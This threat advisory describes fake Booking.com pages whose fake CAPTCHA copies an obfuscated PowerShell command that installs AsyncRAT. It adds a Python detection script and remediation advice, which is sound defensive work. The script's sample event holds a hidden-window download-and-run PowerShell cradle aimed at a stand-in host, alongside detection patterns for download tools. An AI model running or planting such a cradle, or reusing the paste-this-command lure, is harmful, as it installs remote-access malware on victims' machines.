Severity
High
Analysis Summary
Cybercriminals have launched a highly deceptive campaign that targets travelers by leveraging fake Booking.com websites to distribute AsyncRAT malware.
According to the researchers, the attackers lure victims through misleading sponsored advertisements, social media posts, and gaming sites, redirecting them to convincing replica booking pages. These fake websites appear genuine and exploit the fact that around 40% of travelers search for and book their trips through general online search engines, which gives malicious actors a wide attack surface to operate within.
Once users arrive on these fraudulent booking platforms, they are presented with a fake CAPTCHA verification prompt, a tactic that mimics the legitimate security checks commonly seen on authentic websites. This CAPTCHA, however, serves a far more dangerous purpose. Behind the scenes, it silently copies an obfuscated PowerShell command to the user’s clipboard without their knowledge. The command is made to look like a random, unreadable string through techniques such as mixed letter casing, broken quotes, and manipulated variable names, so that it evades detection and raises no immediate suspicion.
When decoded and executed, the PowerShell script launches a hidden terminal that downloads a file named ckjg.exe, which then retrieves and runs Stub.exe. This final payload installs AsyncRAT, a powerful remote access trojan, onto the victim’s device. This RAT grants the attackers complete remote control of the compromised machine, enabling data theft, surveillance, and the potential for further exploitation. This multi-stage infection chain demonstrates a well-orchestrated combination of obfuscation and staged payload delivery.
The most alarming aspect of the attack is its use of social engineering to manipulate users into compromising themselves. After the malicious command is silently copied to the clipboard, the fake booking site presents instructions encouraging the user to paste and run the command via the Windows Run dialog box, under the guise of completing their reservation. This deceptive method transforms the victim into an unknowing participant in their own device’s infection, effectively bypassing many traditional security measures and relying instead on human error and trust in familiar digital interfaces.
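The obfuscation tricks described above (mixed casing, fragmented quoted strings) are cheap to undo before matching. The following is an added detection example, not code from the advisory or its researchers: it normalizes PowerShell command lines from constructed process-creation events and flags the combination of signals this chain produces (interactive parent, hidden window, download cradle, the stage filenames named in the advisory). The event layout, the example.invalid host and the assumption that a command pasted into the Run dialog shows explorer.exe as its parent are all assumptions for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon event ID 1 style); not real telemetry
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hIdDeN -c \"$u='ht'+'tp://'+'example.invalid'+'/ckjg.exe';"
                "iWr $u -OutFile $env:TEMP\\ckjg.exe; & $env:TEMP\\ckjg.exe\""},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

def normalize(cmdline):
    """Undo the cheap obfuscation the advisory describes: mixed letter casing,
    fragmented quoted strings ('ht'+'tp'), and backtick escapes."""
    s = cmdline.lower().replace("`", "")
    s = re.sub(r"['\"]\s*\+\s*['\"]", "", s)   # join 'ht'+'tp' -> 'http'
    s = re.sub(r"['\"]", "", s)                 # drop the remaining quotes
    return re.sub(r"\s+", " ", s).strip()

# Each rule is evaluated against the normalized command line
RULES = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden\b|-w\s+h\b",
    "download_cradle": r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b",
    "known_stage_name": r"\b(?:ckjg|stub)\.exe\b",          # filenames named in the advisory
    "exe_from_temp": r"(?:\$env:temp|%temp%)\\[^\s;]+\.exe",
}

def analyze(event):
    """Return the names of the rules a PowerShell process-creation event triggers."""
    hits = []
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return hits
    # Assumption: a command pasted into the Run dialog shows explorer.exe as parent
    if event["parent"].lower().endswith("\\explorer.exe"):
        hits.append("interactive_parent")
    if re.search(r"['\"]\s*\+\s*['\"]", event["cmdline"]):
        hits.append("fragmented_strings")          # obfuscation signal, checked on the raw line
    norm = normalize(event["cmdline"])
    hits.extend(name for name, pattern in RULES.items() if re.search(pattern, norm))
    return hits

def triage(events, threshold=3):
    """Return (index, hits) for events that trip at least `threshold` rules."""
    return [(i, analyze(e)) for i, e in enumerate(events) if len(analyze(e)) >= threshold]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Any single rule fires on benign administration too; the value is in requiring several of them together, which is what the threshold in triage enforces.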
Impact
- Sensitive Data Theft
- Unauthorized Remote Access
Indicators of Compromise
Domain Name
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Refrain from visiting travel sites via social media ads, gaming sites, or unfamiliar links. Always go directly to official URLs.
- Double-check domain names for typos or unusual characters. Use trusted sources or bookmarks to access booking platforms.
- Train employees and users to recognize deceptive CAPTCHA prompts and avoid executing unknown commands or scripts.
- Use browser settings or extensions to restrict clipboard access from websites, reducing the risk of automatic malicious copying.
- Implement Group Policies to limit PowerShell usage, particularly for non-administrative users, and block script execution when not needed.
- Use endpoint detection solutions that can monitor for unusual clipboard actions or unauthorized PowerShell usage.
- Utilize EDR tools that can detect and block AsyncRAT and similar malware based on behavior, not just signatures.
- Keep all operating systems, browsers, and security software up to date to minimize vulnerabilities.
- Allow only approved applications and scripts to run on user systems to prevent the execution of unverified malware.
- If a fake site is encountered, report it to your IT/security team and platforms like Google Safe Browsing or Microsoft.